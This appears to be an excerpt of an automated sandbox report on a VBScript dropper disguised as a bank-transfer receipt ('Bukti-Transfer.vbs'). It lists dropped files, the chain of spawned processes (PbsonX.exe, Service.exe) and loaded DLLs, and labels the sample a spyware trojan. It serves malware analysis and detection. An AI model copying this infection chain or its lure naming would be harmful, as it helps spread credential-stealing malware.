Source: 2.2.PbsonX.exe.376d980.4.raw.unpack, -m-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.PbsonX.exe.376d980.4.raw.unpack, -m-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.PbsonX.exe.376d980.4.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@51/6@6/7
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\aus1[1].js Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Mutant created: NULL
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\MKLTPZ.js Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bukti-Transfer.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Bukti-Transfer.vbs Virustotal: Detection: 38%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bukti-Transfer.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MKLTPZ.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MKLTPZ.js" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: fwpuclnt.dll
